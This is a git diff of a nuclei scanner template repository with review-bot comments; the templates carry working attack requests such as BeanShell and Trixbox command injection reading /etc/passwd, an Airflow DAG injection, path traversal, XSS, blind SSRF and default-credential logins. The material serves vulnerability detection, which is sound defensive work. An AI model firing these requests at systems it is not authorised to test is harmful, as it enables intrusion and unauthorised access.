diff --git a/README.md b/README.md index 876f6deb25..5ed60f9fa1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 170 | exposed-panels | 137 | -| takeovers | 67 | exposures | 104 | technologies | 77 | -| misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 28 | exposed-tokens | 0 | dns | 8 | -| fuzzing | 9 | helpers | 8 | iot | 12 | +| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 | +| takeovers | 67 | exposures | 105 | technologies | 98 | +| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | +| default-logins | 30 | exposed-tokens | 0 | dns | 9 | +| fuzzing | 9 | helpers | 8 | iot | 13 | -**108 directories, 1148 files**. +**111 directories, 1207 files**. diff --git a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml b/cnvd/CNVD-2019-01348.yaml similarity index 94% rename from vulnerabilities/other/xiuno-bbs-reinstallation.yaml rename to cnvd/CNVD-2019-01348.yaml index fd4ad35902..4102e9234e 100644 --- a/vulnerabilities/other/xiuno-bbs-reinstallation.yaml +++ b/cnvd/CNVD-2019-01348.yaml @@ -1,11 +1,12 @@ -id: xiuno-bbs-reinstallation +id: CNVD-2019-01348 + info: name: Xiuno BBS CNVD-2019-01348 author: princechaddha severity: medium description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 - tags: xiuno + tags: xiuno,cnvd requests: - method: GET 
diff --git a/vulnerabilities/other/xunchi-file-read.yaml b/cnvd/CNVD-2020-23735.yaml similarity index 85% rename from vulnerabilities/other/xunchi-file-read.yaml rename to cnvd/CNVD-2020-23735.yaml index cc804905e3..88cf7d0df7 100644 --- a/vulnerabilities/other/xunchi-file-read.yaml +++ b/cnvd/CNVD-2020-23735.yaml @@ -1,16 +1,18 @@ -id: xunchi-file-read +id: CNVD-2020-23735 + info: - name: Xxunchi LFR (CNVD-2019-01348 + name: Xxunchi Local File read author: princechaddha severity: medium description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information. reference: https://www.cnvd.org.cn/flaw/show/2025171 - tags: xunchi,lfi + tags: xunchi,lfi,cnvd requests: - method: GET path: - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php" + matchers-condition: and matchers: - type: status @@ -21,4 +23,4 @@ requests: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" part: body - condition: and + condition: and \ No newline at end of file diff --git a/default-logins/smartweb/ruijie-smartweb-default-password.yaml b/cnvd/CNVD-2020-56167.yaml similarity index 90% rename from default-logins/smartweb/ruijie-smartweb-default-password.yaml rename to cnvd/CNVD-2020-56167.yaml index 099edceff0..1fe06f6c1c 100644 --- a/default-logins/smartweb/ruijie-smartweb-default-password.yaml +++ b/cnvd/CNVD-2020-56167.yaml @@ -1,11 +1,11 @@ -id: ruijie-smartweb-default-password +id: CNVD-2020-56167 info: name: Ruijie Smartweb Default Password author: pikpikcu severity: low reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - tags: ruijie,default-login + tags: ruijie,default-login,cnvd requests: - method: POST diff --git a/vulnerabilities/other/CNVD-2020-62422.yaml b/cnvd/CNVD-2020-62422.yaml similarity index 94% rename from vulnerabilities/other/CNVD-2020-62422.yaml rename to cnvd/CNVD-2020-62422.yaml index 19715aaafb..736770f82c 100644 
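Review bot: The renamed `name` line still carries the typo `Xxunchi`; with the id now `CNVD-2020-23735` and tags `xunchi,lfi,cnvd`, `name: Xunchi Local File Read` would match the rest of the template (the `description` says "Xunyou cms" — if that is the same product, pick one spelling so the template is findable by search). The second hunk (`@@ -21,4 +23,4 @@`) replaces `condition: and` with an identical line only to drop the file's trailing newline (`\ No newline at end of file`), while the same commit adds the missing newline in CVE-2021-22122.yaml; keep the newline here as well.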
--- a/vulnerabilities/other/CNVD-2020-62422.yaml +++ b/cnvd/CNVD-2020-62422.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium reference: https://blog.csdn.net/m0_46257936/article/details/113150699 - tags: lfi + tags: lfi,cnvd requests: - method: GET diff --git a/vulnerabilities/other/weiphp-path-traversal.yaml b/cnvd/CNVD-2020-68596.yaml similarity index 95% rename from vulnerabilities/other/weiphp-path-traversal.yaml rename to cnvd/CNVD-2020-68596.yaml index b50c3ba268..9f1c78f053 100644 --- a/vulnerabilities/other/weiphp-path-traversal.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -1,11 +1,11 @@ -id: weiphp-path-traversal +id: CNVD-2020-68596 info: name: WeiPHP 5.0 Path Traversal author: pikpikcu severity: critical reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html - tags: weiphp,lfi + tags: weiphp,lfi,cnvd requests: - raw: diff --git a/exposures/configs/eea-disclosure.yaml b/cnvd/CNVD-2021-10543.yaml similarity index 90% rename from exposures/configs/eea-disclosure.yaml rename to cnvd/CNVD-2021-10543.yaml index 459b5ea63a..a29fe66f5a 100644 --- a/exposures/configs/eea-disclosure.yaml +++ b/cnvd/CNVD-2021-10543.yaml @@ -1,11 +1,11 @@ -id: eea-disclosure +id: CNVD-2021-10543 info: name: EEA Information Disclosure author: pikpikcu severity: high reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure + tags: config,exposure,cnvd requests: - method: GET diff --git a/exposures/configs/ruijie-smartweb-disclosure.yaml b/cnvd/CNVD-2021-17369.yaml similarity index 90% rename from exposures/configs/ruijie-smartweb-disclosure.yaml rename to cnvd/CNVD-2021-17369.yaml index 47bf5c2ed1..8377c8296c 100644 --- a/exposures/configs/ruijie-smartweb-disclosure.yaml +++ b/cnvd/CNVD-2021-17369.yaml 
@@ -1,11 +1,11 @@ -id: ruijie-smartweb-disclosure +id: CNVD-2021-17369 info: name: Ruijie Smartweb Management System Password Information Disclosure author: pikpikcu severity: medium reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure + tags: ruijie,disclosure,cnvd requests: - method: GET diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml new file mode 100644 index 0000000000..4302b87a88 --- /dev/null +++ b/cnvd/CNVD-2021-30167.yaml @@ -0,0 +1,45 @@ +id: CNVD-2021-30167 + +info: + name: UFIDA NC BeanShell Remote Code Execution + author: pikpikcu + severity: high + reference: | + - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + - https://www.cnvd.org.cn/webinfo/show/6491 + tags: beanshell,rce,cnvd + +requests: + - raw: + - | #linux + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("id"); + + - | #windows + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("ipconfig"); + + matchers-condition: and + matchers: + + - type: regex + regex: + - "uid=" + - "Windows IP" + condition: or + + - type: word + words: + - "BeanShell Test Servlet" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml new file mode 100644 index 0000000000..f72453f16f --- /dev/null +++ b/cves/2017/CVE-2017-14535.yaml 
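Review bot: The `info` block of CNVD-2021-30167 has no `description`, yet both raw requests run an OS command on the target (`bsh.script=exec("id");` and `exec("ipconfig");`), which an operator should be able to read before launching the template; add e.g. `description: Detects the exposed UFIDA NC BeanShell servlet by running a read-only command (id / ipconfig) and matching its output.` Because `matchers-condition: and` requires the `BeanShell Test Servlet` word together with the `uid=`/`Windows IP` regex, a servlet that is present but refuses execution will not match — worth stating in the same description so a miss is not read as "not exposed". The file also ends without a trailing newline.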
@@ -0,0 +1,32 @@ +id: CVE-2017-14535 + +info: + name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability + author: pikpikcu + severity: high + reference: | + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + tags: cve,cve2017,trixbox,rce + +requests: + - raw: + - | + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml new file mode 100644 index 0000000000..f37b6660e4 --- /dev/null +++ b/cves/2017/CVE-2017-3528.yaml @@ -0,0 +1,21 @@ +id: CVE-2017-3528 + +info: + name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect + author: 0x_Akoko + severity: low + reference: | + - https://blog.zsec.uk/cve-2017-3528/ + - https://www.exploit-db.com/exploits/43592 + tags: oracle,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" + + matchers: + - type: word + words: + - 'noresize src="/\example.com?configName=' + part: body \ No newline at end of file diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml index ff41ff3d83..0aec140f4e 100644 --- a/cves/2018/CVE-2018-0296.yaml +++ b/cves/2018/CVE-2018-0296.yaml @@ -11,12 +11,16 @@ requests: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + headers: + Accept-Encoding: deflate + matchers-condition: and matchers: - type: word words: - "///sessions" part: body + - type: status status: - 200 
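Review bot: The raw request hardcodes `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=`, so the `lang=` injection is only exercised when that credential pair is still accepted by `/maint/`; when it is rejected the template reports nothing, which is not the same as "not vulnerable". The `info` block has no `description` at all, unlike the other CVE templates in this commit; something like `description: Checks for CVE-2017-14535 OS command injection in /maint/modules/home/index.php. The request relies on the default maint credentials, so a negative result does not rule the host out.` makes the limitation visible at triage time.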
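Review bot: `tags: oracle,redirect` in CVE-2017-3528.yaml omits the `cve,cve2017` tags every other CVE template in this commit carries (CVE-2017-14535 uses `cve,cve2017,trixbox,rce`), so a `-tags cve` run will skip this template; use `tags: cve,cve2017,oracle,redirect`. The info block also lacks a `description`, and the file ends without a trailing newline.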
diff --git a/exposures/logs/circarlife-system-log.yaml b/cves/2018/CVE-2018-12634.yaml similarity index 88% rename from exposures/logs/circarlife-system-log.yaml rename to cves/2018/CVE-2018-12634.yaml index 5567438fa5..ac652812c9 100644 --- a/exposures/logs/circarlife-system-log.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,4 +1,4 @@ -id: circarlife-system-log +id: CVE-2018-12634 info: name: Exposed CirCarLife System Log @@ -6,7 +6,7 @@ info: description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ severity: medium - tags: scada,circontrol,circarlife,logs + tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml new file mode 100644 index 0000000000..0b7751f18a --- /dev/null +++ b/cves/2020/CVE-2020-11978.yaml 
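Review bot: After the rename to CVE-2018-12634 the `reference` line still points at the vendor homepage `https://circontrol.com/` rather than the CVE record, and neither `name` nor `description` mention the CVE, so a reader cannot tell which issue the template covers; add `reference: https://nvd.nist.gov/vuln/detail/CVE-2018-12634` and name the CVE in the description. `severity` sits after `reference` here while the other templates place it before — cosmetic, but worth aligning since the file is being touched anyway.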
@@ -0,0 +1,64 @@ +id: CVE-2020-11978 +info: + name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution + author: pdteam + severity: high + description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. + reference: | + - https://github.com/pberba/CVE-2020-11978 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 + - https://twitter.com/wugeej/status/1400336603604668418 + tags: cve,cve2020,apache,airflow,rce + +requests: + - raw: + - | + GET /api/experimental/test HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + - | + POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Content-Length: 85 + Content-Type: application/json + + {"conf": {"message": "\"; touch test #"}} + + - | + GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + + extractors: + - type: regex + name: exec_date + part: body + group: 1 + internal: true + regex: + - '"execution_date":"([0-9-A-Z:+]+)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_4, "operator":"BashOperator")' + - 'contains(all_headers_4, "application/json")' + condition: and \ No newline at end of file 
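Review bot: The template changes state on the target — the second request unpauses `example_trigger_target_dag` and the third creates a DAG run whose `conf.message` executes `touch test` on the worker — but the `description` only describes the vulnerability, so an operator cannot see that the scan is not read-only; append a sentence such as `Note: this check unpauses the example DAG and triggers a run that creates a file named 'test' on the worker.` The third request also declares `Content-Length: 85` for a body that is 41 bytes as shown here; if nuclei recomputes the header for raw requests the line is merely misleading, otherwise it is wrong, so drop or correct it. Finally, `id:` and `info:` are not separated by a blank line as in the other new templates.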
diff --git a/misconfiguration/airflow-api-exposure.yaml b/cves/2020/CVE-2020-13927.yaml similarity index 52% rename from misconfiguration/airflow-api-exposure.yaml rename to cves/2020/CVE-2020-13927.yaml index 2d73efdfce..0a5d03ba2a 100644 --- a/misconfiguration/airflow-api-exposure.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -1,18 +1,20 @@ -id: airflow-api-exposure +id: CVE-2020-13927 info: - name: Apache Airflow API Exposure / Unauthenticated Access + name: Unauthenticated Airflow Experimental REST API author: pdteam severity: medium - tags: apache,airflow,unauth + tags: cve,cve2020,apache,airflow,unauth requests: - method: GET path: - '{{BaseURL}}/api/experimental/latest_runs' + matchers: - type: word words: - '"dag_run_url":' - - '{"items":[' + - '"dag_id":' + - '"items":' condition: and \ No newline at end of file diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml index 4969235916..142c4a081a 100644 --- a/cves/2020/CVE-2020-36112.yaml +++ b/cves/2020/CVE-2020-36112.yaml @@ -3,7 +3,7 @@ id: CVE-2020-36112 info: name: CSE Bookstore 1.0 SQL Injection author: geeknik - description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database. + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. reference: | - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml new file mode 100644 index 0000000000..a0bb988cd8 --- /dev/null +++ b/cves/2020/CVE-2020-6308.yaml 
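Review bot: The template is now tagged `cve,cve2020` and renamed to CVE-2020-13927, yet its `info` block carries no `reference` or `description`; add at least `reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13927` so the finding can be triaged against the advisory. Requiring `"dag_run_url":`, `"dag_id":` and `"items":` together is tighter than the old `{"items":[` check, which is good; the file still ends without a trailing newline.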
@@ -0,0 +1,21 @@ +id: CVE-2020-6308 + +info: + name: Unauthenticated Blind SSRF in SAP + author: madrobot + severity: medium + reference: https://github.com/InitRoot/CVE-2020-6308-PoC + tags: cve,cve2020,sap,ssrf,oob + +requests: + - method: POST + path: + - '{{BaseURL}}/AdminTools/querybuilder/logon?framework=' + + body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml new file mode 100644 index 0000000000..5271910e78 --- /dev/null +++ b/cves/2021/CVE-2021-21985.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-21985 + +info: + name: VMware vSphere Client (HTML5) RCE + author: D0rkerDevil + severity: critical + description: | + The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 + - https://www.vmware.com/security/advisories/VMSA-2021-0010.html + - https://github.com/alt3kx/CVE-2021-21985_PoC + tags: cve,cve2021,rce,vsphere + +requests: + - raw: + - | + POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + Content-Length: 86 + Connection: close + + {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} + + matchers: + - type: word + words: + - '{"result":{"isDisconnected":' + part: body 
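Review bot: In CVE-2021-21985.yaml the matcher only confirms that `getClusterCapabilityData` answers an unauthenticated POST with `{"result":{"isDisconnected":`; nothing is executed, so the template detects the reachable vSAN Health plug-in endpoint rather than proving code execution as the name `VMware vSphere Client (HTML5) RCE` implies. Add to `description`: `This template only verifies that the vSAN Health plug-in endpoint is reachable without authentication; it does not attempt code execution.` so the critical finding is triaged correctly. `Content-Length: 86` also does not match the 84-byte body shown here; drop it if nuclei recomputes the header.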
diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 60c70d0949..213b811b3d 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -23,6 +23,7 @@ requests: - method: GET path: - "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//" + - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//" matchers-condition: and matchers: - type: word @@ -30,4 +31,4 @@ requests: - "nuclei" - "No policy has been chosen." condition: and - part: body \ No newline at end of file + part: body diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml new file mode 100644 index 0000000000..00b724d223 --- /dev/null +++ b/cves/2021/CVE-2021-24316.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-24316 + +info: + author: 0x_Akoko + description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS. + name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress + severity: medium + tags: cve,cve2021,mediumish,xss,wordpress + reference: | + - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e + - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt + +requests: + - method: GET + path: + - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E ' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + - "Sorry, no posts matched your criteria." + part: body + condition: and + + - type: word + words: + - "text/html" + part: header diff --git a/default-logins/apache/airflow-default-credentials.yaml b/default-logins/apache/airflow-default-credentials.yaml new file mode 100644 index 0000000000..50bcb9d651 --- /dev/null +++ b/default-logins/apache/airflow-default-credentials.yaml 
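Review bot: In CVE-2021-24316.yaml the single `path` entry ends with a space inside the quotes (`...%3C/script%3E '`), which is sent as part of the URL; remove the trailing blank. As rendered here the first `words` entry is `""` — an empty string matches every body, so the `and` condition collapses to the `Sorry, no posts matched your criteria.` check alone; if the reflected payload was lost in rendering ignore this, otherwise the entry should carry the `{{randstr}}` payload string. `name` and `description` also read as each other's content (the description is the short title, the name the long sentence); swapping them matches the other templates.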
@@ -0,0 +1,61 @@ +id: airflow-default-credentials + +info: + name: Apache Airflow Default Credentials + author: pdteam + severity: critical + tags: airflow,default-login + reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + +requests: + - raw: + - | + GET /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + + - | + POST /admin/airflow/login HTTP/1.1 + Host: {{Hostname}} + Content-Length: 152 + Cache-Control: max-age=0 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + Accept-Encoding: gzip, deflate + Accept-Language: en-IN,en;q=0.9 + Connection: close + + username=airflow&password=airflow&_csrf_token={{csrf_token}} + + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + internal: true + regex: + - 'csrf_token" type="hidden" value="([A-Za-z0-9.-]+)">' + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "session=." + - "/admin/" + part: header + condition: and + + - type: word + words: + - 'You should be redirected automatically to target URL: /admin/' + part: body + + - type: status + status: + - 302 diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml new file mode 100644 index 0000000000..08f426e7da --- /dev/null +++ b/default-logins/arl/arl-default-password.yaml 
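Review bot: The POST hardcodes `Content-Length: 152` while the body `username=airflow&password=airflow&_csrf_token={{csrf_token}}` has a length that depends on the extracted token; if nuclei recomputes the header for raw requests the line is dead weight, otherwise it truncates or over-reads the body, so drop it. The `info` block has no `description`; `description: Attempts to log in to the Airflow admin UI with the documented default credentials (airflow/airflow).` tells an operator what the critical finding means. The two requests also use different `Accept-Language` values (`en-US` vs `en-IN`), which looks like a copy-paste rather than intent.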
@@ -0,0 +1,29 @@ +id: arl-default-password + +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + + matchers-condition: and + matchers: + + - type: word + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + condition: and + - type: status + status: + - 200 diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml new file mode 100644 index 0000000000..95d6c454af --- /dev/null +++ b/default-logins/szhe/szhe-default-password.yaml @@ -0,0 +1,33 @@ +id: szhe-default-password + +info: + name: Szhe Default Password + author: pikpikcu + severity: low + tags: szhe,default-login + vendor: https://github.com/Cl0udG0d/SZhe_Scan + +requests: + - method: POST + path: + - "{{BaseURL}}/login/" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + email=springbird@qq.com&password=springbird&remeber=true + + matchers-condition: and + matchers: + + - type: word + words: + - 'You should be redirected automatically to target URL: /' + + - type: word + words: + - 'Set-Cookie: session' + part: header + + - type: status + status: + - 302 diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml new file mode 100644 index 0000000000..2c7870a1f1 --- /dev/null +++ b/dns/dns-waf-detect.yaml 
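Review bot: `severity: high` here and `severity: low` in szhe-default-password.yaml from the same commit grade the same class of finding — a default admin login succeeding — differently; both are `default-login` checks and should use one level. `body: |` keeps the trailing newline after the JSON, so the request body is `{...}\n`; `body: |-` sends exactly the document. The info block also has no `reference` or `description` saying which ARL product `/api/user/login` belongs to.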
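Review bot: In szhe-default-password.yaml `vendor:` is not one of the `info` keys used elsewhere in the repository (`name`, `author`, `severity`, `description`, `reference`, `tags`); put the URL under `reference: https://github.com/Cl0udG0d/SZhe_Scan` so tooling that reads references finds it. As in the ARL template, `body: |` appends a newline to the form body; use `|-`. `severity: low` for a successful default-credential login is inconsistent with `high` in the ARL template.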
@@ -0,0 +1,172 @@ +id: dns-waf-detect + +info: + name: DNS WAF Detection + author: lu4nx + severity: info + tags: tech,waf,dns + +dns: + - name: "{{FQDN}}" + type: CNAME + recursion: true + retries: 5 + class: inet + + - name: "{{FQDN}}" + type: NS + recursion: true + retries: 5 + class: inet + + matchers: + - type: word + name: sanfor-shield + words: + - ".sangfordns.com" + + - type: word + name: 360panyun + words: + - ".360panyun.com" + + - type: word + name: baiduyun + words: + - ".yunjiasu-cdn.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.cn" + - ".cyudun.net" + + - type: word + name: knownsec + words: + - ".jiashule.com" + - ".jiasule.org" + + - type: word + name: huaweicloud + words: + - ".huaweicloudwaf.com" + + - type: word + name: xinliuyun + words: + - ".ngaagslb.cn" + + - type: word + name: chinacache + words: + - ".chinacache.net" + - ".ccgslb.net" + + - type: word + name: nscloudwaf + words: + - ".nscloudwaf.com" + + - type: word + name: wangsu + words: + - ".wsssec.com" + - ".lxdns.com" + - ".wscdns.com" + - ".cdn20.com" + - ".cdn30.com" + - ".ourplat.net" + - ".wsdvs.com" + - ".wsglb0.com" + - ".wswebcdn.com" + - ".wswebpic.com" + - ".wsssec.com" + - ".wscloudcdn.com" + - ".mwcloudcdn.com" + + - type: word + name: qianxin + words: + - ".360safedns.com" + - ".360cloudwaf.com" + + - type: word + name: baiduyunjiasu + words: + - ".yunjiasu-cdn.net" + + - type: word + name: anquanbao + words: + - ".anquanbao.net" + + - type: regex + name: aliyun + regex: + - '\.w\.kunlun\w{2,3}\.com' + + - type: regex + name: aliyun-waf + regex: + - '\.aliyunddos\d+\.com' + - '\.aliyunwaf\.com' + - '\.aligaofang\.com' + - '\.aliyundunwaf\.com' + + - type: word + name: xuanwudun + words: + - ".saaswaf.com" + - ".dbappwaf.cn" + + - type: word + name: yundun + words: + - ".hwwsdns.cn" + - ".yunduncname.com" + + - type: word + name: knownsec-ns + words: + - ".jiasule.net" + + - type: word + name: chuangyudun + words: + - ".365cyd.net" + + - type: word + 
name: qianxin + words: + - ".360wzb.com" + + - type: word + name: anquanbao + words: + - ".anquanbao.com" + + - type: word + name: wangsu + words: + - ".chinanetcenter.com" + + - type: word + name: baiduyunjiasue + words: + - ".ns.yunjiasu.com" + + - type: word + name: chinacache + words: + - ".chinacache.com" + + - type: word + name: cloudflare + words: + - "ns.cloudflare.com" + + - type: word + name: edns + words: + - ".iidns.com" diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml deleted file mode 100644 index 9130363b09..0000000000 --- a/exposed-panels/airflow-exposure.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: airflow-exposure - -info: - name: Apache Airflow Exposure / Unauthenticated Access - author: pdteam - severity: medium - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin/' - matchers: - - type: word - words: - - 'Airflow - DAGs' - - '' - condition: and \ No newline at end of file diff --git a/exposed-panels/airflow-panel.yaml b/exposed-panels/airflow-panel.yaml new file mode 100644 index 0000000000..3b97fec8be --- /dev/null +++ b/exposed-panels/airflow-panel.yaml @@ -0,0 +1,24 @@ +id: airflow-panel + +info: + name: Airflow Admin login + author: pdteam + severity: info + tags: panel,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow - Login" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/exposed-panels/clave-login-panel.yaml b/exposed-panels/clave-login-panel.yaml new file mode 100644 index 0000000000..6b10058d50 --- /dev/null +++ b/exposed-panels/clave-login-panel.yaml 
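Review bot: Several matcher `name` values in dns-waf-detect.yaml are reused for a second list — `chuangyudun`, `qianxin`, `anquanbao`, `wangsu` and `chinacache` each appear twice — and `baiduyun` and `baiduyunjiasu` both list `.yunjiasu-cdn.net`, while `.wsssec.com` appears twice inside the `wangsu` list; nuclei reports the matcher name, so duplicate names make output ambiguous and the repeated domains are dead entries. Merge each provider's CNAME and NS patterns under one name (or suffix them, e.g. `wangsu-cname` / `wangsu-ns`) and drop the repeats. `baiduyunjiasue` looks like a typo for `baiduyunjiasu`.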
